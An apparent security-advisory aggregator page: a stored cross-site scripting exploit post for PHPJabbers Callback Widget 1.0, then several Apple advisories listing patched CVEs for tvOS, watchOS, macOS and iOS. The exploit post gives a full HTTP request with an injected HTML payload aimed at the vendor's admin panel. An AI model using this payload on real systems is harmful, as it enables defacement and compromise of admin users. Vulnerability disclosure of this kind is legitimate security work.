PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

Apple Security Advisory 01-22-2024-9 - tvOS 17.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-9 tvOS 17.3

tvOS 17.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214055.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

NSSpellChecker  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

TCC  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDyQACgkQX+5d1TXa  
IvoUsA//bw9u1+Jxh79G7jV7SXt8HRV8yqr16Bhq00AqSdDx/RgVGTUs6cN8OfGX  
MVda91yeQS7WOEtrw7no8vD2HcGSvcTCRWTRQRSYJjZfZ4C3v9Rnt3Nlx/mvdLQg  
50Kn3Gm46C/+iFhuZhtSa9VrDhoaiLs3Wb9nVBrQ917CyNMXeDb1JuP1MOjPJgiJ  
IVZlcIwAFrx4f779ove/MtupyeeoHZwV1KICEDyVIZsUGMGf4ti6J8tdK73EmUPo  
a1Q6pRx8JRwtXBPkp/1PerRsfzb9bRAksZU6R5d8RdJBTpnx9kfZZpPWknyRX2R9  
gR6tJrswgHcalkHDL6UXJfnWS3XCrCHg2jKQbWPDvor6juOMUKfi40ww36H6KdRG  
ksNdFaWhmSK0Qu1EqS4bmCWYiUx16O/js7tbbNfXFp+ssjMtjunlVs9Ly3Jh2Fpi  
gry4IRE5Ll4oryFxUPV9KGM72eDL8PAwvIgDXx5/NkcrZIGZNl9eseJCsfZ/AV7Z  
dZTcc78Yguenm5Nsot6GmL1q0+LCj48PmcFu6VQF7KSFWcehAKjVIk+DaAOJITgF  
uJekaVJp3mVe5XRvtQrfMlegiog40gPxQgwJ/psUyp3Ss5uIOPF6EUrAj2xqERRc  
GVDDKWA3BFSCOJD/dtR/xmiwJdRMQwomeo8k1uUpd96ICM6VgJM=  
=HfBk  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-9

Apple Security Advisory 01-22-2024-8 - watchOS 10.3 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

Mail Search  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSSpellChecker  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23217: Kirin (@Pwnrin)

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDqsACgkQX+5d1TXa  
IvqR0Q//a137PlcPioIws/A02XClBQtF95fwuaz7DEhi79XZvH1q1+N3EYd/1b8l  
YkGdXQik8uS4zpB4KBJ+8cRYqaNaMDO0lNr2RdGgUInMd2bc+HBHigxEY47Wzbr2  
UT3r2uJW70HalBNrGNOj15JQTQ4MhbjjTq/ezrIdCFTo1RHk9vOc//AajbDtWiQp  
X5jGhoGzDB378vswEEyp4OjArh5v2xEv5hcoIvrzlgkSz9aRwzLgluR7sXGifE6O  
vU7zP2oT36zwBAfTsY1CkarTeQprQ4iyiEIlDzwxr+Z2ooGUmOStzsQtuU28QSQK  
sl0b42V7mkTFWVCXymsjCBbGw/JPSkGzptOPNqoEtBddiMuLU2BGBWk51xa5cEzy  
tsLWd1vlnUms3CqM6QvOxdj3mzs4wzxha941a0h67lR7NeR09CqflKsr7vDFWOBY  
PdVAUSDRxeM1rntVJfFJAkssUV14TGSTDwqMQmiUyxqXfKymSc4dCqIDLyqcdblB  
wNtwKFlstCZxcmc2V0zfDWHJ0y75sTUUhlk3AvH/OeVve9rhDvtKdoKDHdOauKHw  
kss00oy5TLkeTYi26oJfEMtts7BS+8ZEF3cLNxOBZ/cdIO1+Ifl8jNcluTLlC8F7  
4MxcjC8prTl0aZ4sqJfcUBLnqkMdn0GaqXOPXSa6hQxiNc5dcIk=  
=hoM+  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-8

Apple Security Advisory 01-22-2024-7 - macOS Monterey 12.7.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

macOS Monterey 12.7.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214057.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

curl  
Available for: macOS Monterey  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Mail Search  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Monterey 12.7.3 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDnUACgkQX+5d1TXa  
Ivqrqw//QZOnZpH5CnbfH10rxFF0CbZFRcHClM3RutihC4AuO5FedR3EDnUGyp53  
eJADLlNz3dTg15scv6P4AuT+hg8k3OFEPi1f2jVgRxlqsW8a15iIXYGti8y4UVwo  
kQgzfxYv33zuY0yWlIlERIP7imIT0jNgwFKn+Gs2ZaBq1xw52xq3I/jf97txAQHX  
Rpe35hnhYS7eGlB8spErKGBgyTuOf+piL7zccb+G/Hw6Y8AwSLsvXg3lSgZavEWE  
UIBoYGLycszT9U7tybuPUJ83jD0lIqFNhGNzHM6BnajYJ8SVdAXqVfid8Km9ixoi  
Sm73F6ZlCrUSLxihjXz92NQnBXJM2AxVI3Z1QqsqxOTS9yrkHYSgFgqUxxaP7ONt  
voHYw6fuycYca9TbFPmu6aStW1UBNwMLWYgjxbuTqqs+OEI8DKGcHIihGPQ184jW  
VF1bYNK8bvRMM+n/kaIHNo9/AyPnnSjmEOzr946ypg90FvTy3Wu1HhUm1MslzjNC  
LG5j6/hh0H7MXii8o5UL4ayabnPyZbWJrhRntvwx86xTLV9DPwmuwvxeVWm87Wu0  
EYC/XRAbtspHXMn5ItTNgqGbf0lKlrluXrAW79EFQdvPyD/Fzyljb+W9o2w1IA/9  
O8oXMVxqM4W+iRokcDbcbNQI3J2xGaP8FNwG6EEBB+bKkNWZ0m0=  
=zFhG  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-7

Apple Security Advisory 01-22-2024-6 - macOS Ventura 13.6.4 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

Finder  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-23224: Brian McNulty

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

LoginWindow  
Available for: macOS Ventura  
Impact: A local attacker may be able to view the previous logged in  
user’s desktop from the fast user switching screen  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42935

Mail Search  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSOpenPanel  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDk0ACgkQX+5d1TXa  
IvrWTw/8DbDE/5ejAyR2F08VphoiOnJD5URY5WINPWVWps0w9svMI83Ig+MLlbVY  
APek5kQlSVJJoI7RXrSxgRCs3gcWVWVo08iVIM6woBbsd5JPaTYXe9/yUdRzWBX4  
zgOxvCh5wL4czXUV0ym4OMlDE5BZ3N+hEpyAIOJmNV7jkNnMshMWfeN6puFZgwt/  
FYt1BrU+MJ4PRA/A3B01ic3VQFnHifCE1jF/ebfb7DwZafK6EO2Hf91MNgAic5Td  
Q4TvwnHOqAq1N0cZa+SKNsStVx5Yk4J0ovNeecdQA2xNVfnd7jLaU1Y57SHjxNi9  
wbsENC3bTpZed+lMhDiBaRIj//Ej6KMeQKUNbcvPH5HCHP5YN68QFwkoA+QJdX66  
SH7jvDI6xgjlvVoNjqZ6bYHDr+CK5AB7fLDXhEGWBIssjce8AeaNPPA7JHMsVCen  
o7WXri4Bb7W4BwfpicTPlumkF+vva+nKYWvuAfob7v2yayeCa8vPKgrEPHXbCnWa  
8r1lqyQVqKL1wqS5RcpsHZEWrV2HF0hoKam4x3ZmLqNDhnVC0t8IipL0vqN+vzaU  
t26QZrpiW8V7CZRiXeCj5rDhv8Z1w+wEiuGLTqp9Z1JD/mCVy7Tmm2Y6RNYZw+jk  
lwpJpwqOpXbsCdx6kU28V8H1elS5cz3RdGCDex55lOlrMXp+KOs=  
=VoRh  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-6

Apple Security Advisory 01-22-2024-5 - macOS Sonoma 14.3 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-5 macOS Sonoma 14.3

macOS Sonoma 14.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214061.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: macOS Sonoma  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Finder  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-23224: Brian McNulty

Kernel  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

LLVM  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23209

Mail Search  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSSpellChecker  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari  
Available for: macOS Sonoma  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

Shortcuts  
Available for: macOS Sonoma  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23203: an anonymous researcher  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: macOS Sonoma  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23217: Kirin (@Pwnrin)

TCC  
Available for: macOS Sonoma  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: macOS Sonoma  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: macOS Sonoma  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: macOS Sonoma  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution  
Description: Multiple memory corruption issues were addressed with  
improved memory handling.  
WebKit Bugzilla: 265129  
CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 Vulnerability  
Research Institute

WebKit  
Available for: macOS Sonoma  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Sonoma 14.3 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDgUACgkQX+5d1TXa  
Ivrf0Q/+Oca+geM2QXg9QR+6PJwuFfzuAMn2nm88bHWtJH6kaTe8Lc48OuFk6j0C  
Q9KoLCDG7JTya701wTgIfCnJEpS7J6JCHxao8qPujebjTFumhvwigwI0uZzD1H2r  
c5fJfQtlNAfG163ON26ZEbF7AMVL630illOUko0ULqYCiUM4qF/5h0zsPJgXjFHJ  
4Yc5nMqH3jVjaAVxwNQhxU1L8Rz0xzOrNPX05FixPx9MTLZ6CuS8cRBYBv1HkLxm  
OIqc4QUuWngNdxQ+ZCEcnr6yg96VXg6S7gVRlLOcTLxDOzRADF0OpztLwtfksMKp  
gB7QllWloOIQ//NfWcNAX/TqmeKvOJ9kVTgRxz6MfwbnVkI9WfW3XQ1joowJ25r7  
mn/X/bk3Bi+U3qTxxiAFi/Wlh2QfSnIwVmd0KWuFnbxs/5LyeGox+jDbRO1xKlfv  
tj1V1aMVBUqj3OIWBbdN/pOpgDhhPfKrdwHNcER/LuTitjXAOhDI60Jdi/6xQBgY  
S4d4duOjvEj7gY3EYJ5qrW/+2f/dNzMw6lsmPpckgKbUwKgqEaHadAEzpxkRZ1rm  
4BOozvMt69WlhCOFEEyVky08opNCQg/uQj0Uegcm6zeEpv98xsk0a9NJMRI+Pjsw  
rdTAOkNCgTy0QROYO+/TympI2LEJkppw+TSbaYK1S+rLDMO9Cvo=  
=rPM0  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-5

Apple Security Advisory 01-22-2024-4 - iOS 15.8.1 and iPadOS 15.8.1 addresses code execution and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-01-22-2024-4 iOS 15.8.1 and iPadOS 15.8.1iOS 15.8.1 and iPadOS 15.8.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214062.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.WebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing web content may disclose sensitive information. Appleis aware of a report that this issue may have been exploited againstversions of iOS before iOS 16.7.1.Description: An out-of-bounds read was addressed with improved inputvalidation.WebKit Bugzilla: 265041CVE-2023-42916: Clément Lecigne of Google's Threat Analysis GroupWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing web content may lead to arbitrary code execution.Apple is aware of a report that this issue may have been exploitedagainst versions of iOS before iOS 16.7.1.Description: A memory corruption vulnerability was addressed withimproved locking.WebKit Bugzilla: 265067CVE-2023-42917: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.8.1 and iPadOS 15.8.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDd8ACgkQX+5d1TXaIvrnYQ//eEhI4dYnq+om+sw4N+fNEcTZWLtBe3GyWgzVtBuvWOwt0Z34BNfVD4jFz1YlzYp18bzYTCdThkIrvQSe/QmYEmdKt16RtQH3qJTyE18h2YLG31gA/ja8iPcNAdqQqz6tJEq9aUrmeyAhFNsEZX7PHVfuSigqi8495rMcN1xI6caCS7Tio98EVmNe6cMRLUefSJH0z5GvwjbTgLCKbhv+/pDAq0L8Lqosy9CFS+oMRYyCdXoPL3E2wOpdnxVgjctp6YJrjT/LFdeT8e3gu6oOo/Pj+bx9RWP8vVS0jos5DXOJJAnLn3qOt9yStqmECBpque3L3PrhToPdSCiIFE8JbHFBWscO/TaF3rQvmZfLSx+HKJR8VSAjpGThjLHWAQUFUauoQ1TudmtA3y9rolCkvhMeZXvbi0dxkEgRtBCbJzRWfMQ6rPeOOkgUUSBkVM/O55bhQ1JqmpUBq2s4lCx6EErwSm1XS6ooXxZt9FWltqhu+ixgne63X8U5+cLJlkRWjeIC63pziGkB6RbIQkupEanrbH8ekRFQs4zIazq1fjZANRN71y+wAZZ5tcbvH37FzUPT7HL9ZPMO8wvVVFEEHNx4RIB+KNSH2E/z67Jhs9nM1atUNg1djufg/mmAfx/83pQretb4xqiN6VKJdPCY/BXkWhBJbdWUpqsODUmfvY0==wSSi-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-4

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

